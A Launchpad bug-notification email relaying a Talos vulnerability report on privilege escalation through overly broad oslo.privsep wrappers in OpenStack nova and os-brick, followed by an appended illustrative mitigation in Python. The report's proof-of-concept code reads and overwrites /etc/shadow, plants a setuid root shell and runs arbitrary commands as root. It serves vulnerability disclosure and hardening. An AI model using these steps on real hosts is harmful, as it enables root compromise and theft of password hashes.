I missed setting the security advisory task to won't fix state when we decided on this as a security hardening opportunity, so have done so now (as it won't have any advisory issued).
** Changed in: ossa
   Status: Incomplete => Won't Fix

--
You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1989008

Title:
  Lax rulesets leading to privilege escalation vulnerabilities

Status in OpenStack Compute (nova):
  Triaged
Status in os-brick:
  New
Status in oslo.privsep:
  Triaged
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:

[OpenStack's vulnerability managers received the following report via encrypted E-mail]

### Summary

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead to increased privileges.

### Confirmed Vulnerable Versions

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

### Product URLs

OpenStack - [https://opendev.org/openstack/](https://opendev.org/openstack/)

### CVSSv3 Score

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

### CWE

CWE-269 - Improper Privilege Management

### Details

OpenStack contains a number of tools, libraries, and services for providing simplified, powerful, and scalable cloud based applications. OpenStack's [oslo.privsep](https://opendev.org/openstack/oslo.privsep) library "helps applications perform actions which require more or less privileges ... in a safe, easy to code and easy to use manner." An entry in sudoers is generally added to bootstrap oslo.privsep with the correct privileges when run from an unprivileged user such as `nova`.

The oslo.privsep [design documents](https://docs.openstack.org/oslo.privsep/latest/user/index.html) state the following:

> Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation.
>
> In this example, update_motd(message) is narrow: it only allows the service to overwrite the MOTD file. If a more generic update_file(filename, content) was created, it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep.
>
> ...
>
> Provided the unprivileged<->privileged boundary contains any hole that effectively grants root to the caller, then there is little benefit to having the separation [provided by privsep]

Two modules were observed to have functions that were overly broad and allowed for trivial escalation to root. The `nova` [module](https://opendev.org/openstack/nova/blob/master/nova/privsep/path.py) contains privileged wrappers for `chmod`, `chown`, `rmdir`, and arbitrary file create/write/move/read. Second, the os_brick [module](https://opendev.org/openstack/os-brick/blob/master/os_brick/privileged/rootwrap.py) contains functions to execute arbitrary shell commands as root. The source file contains the following comment from 2016:

> Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root"). This is intended only as an expedient transition and should be removed ASAP.

Either of the above modules is sufficient to achieve privilege escalation to root. Other modules within OpenStack were not audited, but it is possible that similar issues exist elsewhere in the codebase.
### Crash Information

###### Method 1 (nova)

```
from nova.privsep.path import *
from oslo_config.cfg import CONF
CONF.privsep_context = 'nova.privsep.sys_admin_pctxt'

# Read /etc/shadow
last_bytes("/etc/shadow", 1000)

# Write to /etc/shadow
writefile("/etc/shadow", "wb", b"<payload_here>")

# Get a root shell
os.system("cp /bin/bash /tmp/bash")
chown("/tmp/bash", 0)
chmod("/tmp/bash", 0o4755)
os.system("/tmp/bash -p")
bash-5.1#
```

###### Method 2 (os_brick)

```
from os_brick.privileged.rootwrap import *
from oslo_config.cfg import CONF
import shlex  # helpful for multi-arg commands
CONF.privsep_context = 'os_brick.privileged.default'
execute_root(*shlex.split("id"))
('uid=0(root) gid=0(root) groups=0(root)\n', '')
```

### Mitigation

Privileged functions in the `nova` and `os_brick` modules of OpenStack should be rewritten to be as specialized and narrowly tailored as possible; e.g. `chmod(path, mode)` should be replaced with a function that only applies pre-defined permissions on one or more pre-defined files. Suggest auditing other modules that use oslo.privsep to identify similar issues.

### Credit

Keane O'Kelley of Cisco ASIG
https://talosintelligence.com/vulnerability_reports/

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1989008/+subscriptions

--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to     : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp
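An added illustration of the mitigation the report asks for: a privileged operation that applies pre-defined permissions to pre-defined files, next to the generic `chmod(path, mode)` shape it criticises. This is editorial example code, not code from nova, os-brick or oslo.privsep. It uses a plain Python class in place of oslo.privsep's entrypoint mechanism, and the `NarrowChmod` class, the `PrivsepPolicyError` name, the target table and the scratch files are all constructed for the example.

```python
import os
import stat
import tempfile


class PrivsepPolicyError(PermissionError):
    """Raised when a caller asks the privileged side for something outside its policy."""


def broad_chmod(path, mode):
    """The anti-pattern the report describes: the caller picks any path and any mode.

    Exposed across a privsep boundary this is equivalent to granting the
    unprivileged caller root, since nothing constrains what it may be used on.
    """
    os.chmod(path, mode)


class NarrowChmod:
    """Privileged helper that only knows a fixed table of logical targets.

    The unprivileged side names *what* it wants done ("console_log"); the path
    and mode come from a table that lives on the privileged side and is never
    influenced by the caller. Hypothetical helper, not oslo.privsep's API.
    """

    def __init__(self, targets):
        # targets: {logical_name: (absolute_path, mode)}. Canonicalise at
        # construction so apply() can compare against a stable form.
        self._targets = {
            name: (os.path.realpath(path), mode)
            for name, (path, mode) in targets.items()
        }

    def apply(self, name):
        """Apply the pre-defined mode for `name`; return the resulting mode bits."""
        if name not in self._targets:
            raise PrivsepPolicyError(f"{name!r} is not a permitted target")
        path, mode = self._targets[name]
        # Refuse symlinks: if an unprivileged writer can replace the file with
        # a link, the chmod would otherwise land on whatever it points at.
        if stat.S_ISLNK(os.lstat(path).st_mode):
            raise PrivsepPolicyError(f"{path} is a symlink; refusing")
        # A directory component may also have been swapped for a link.
        if os.path.realpath(path) != path:
            raise PrivsepPolicyError(f"{path} no longer resolves to itself; refusing")
        os.chmod(path, mode)
        return stat.S_IMODE(os.lstat(path).st_mode)


def demo():
    """Exercise both helpers on constructed scratch files; returns a result dict."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        console_log = os.path.join(tmp, "console.log")  # file the service manages
        protected = os.path.join(tmp, "protected")      # file it must never touch
        for p in (console_log, protected):
            with open(p, "w") as fh:
                fh.write("constructed sample\n")
        os.chmod(protected, 0o600)

        # The broad wrapper does whatever it is told.
        broad_chmod(console_log, 0o600)
        results["broad_mode"] = stat.S_IMODE(os.stat(console_log).st_mode)

        helper = NarrowChmod({"console_log": (console_log, 0o640)})
        results["narrow_mode"] = helper.apply("console_log")

        # Anything not in the table is rejected, whatever the caller intends.
        try:
            helper.apply("protected")
            results["unknown_rejected"] = False
        except PrivsepPolicyError:
            results["unknown_rejected"] = True
        results["protected_untouched"] = stat.S_IMODE(os.stat(protected).st_mode) == 0o600

        # If the managed file is replaced by a link to the protected one, the
        # symlink check stops the operation before any mode change happens.
        os.remove(console_log)
        os.symlink(protected, console_log)
        try:
            helper.apply("console_log")
            results["symlink_rejected"] = False
        except PrivsepPolicyError:
            results["symlink_rejected"] = True
        results["protected_still_untouched"] = stat.S_IMODE(os.stat(protected).st_mode) == 0o600
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {oct(value) if isinstance(value, int) and not isinstance(value, bool) else value}")
```

The design point is that the narrow interface has no parameter through which a path or a mode can be supplied, so an unprivileged caller cannot turn it into a generic root primitive; the symlink and realpath checks cover the remaining case where the file behind a pre-defined path has been replaced between two calls.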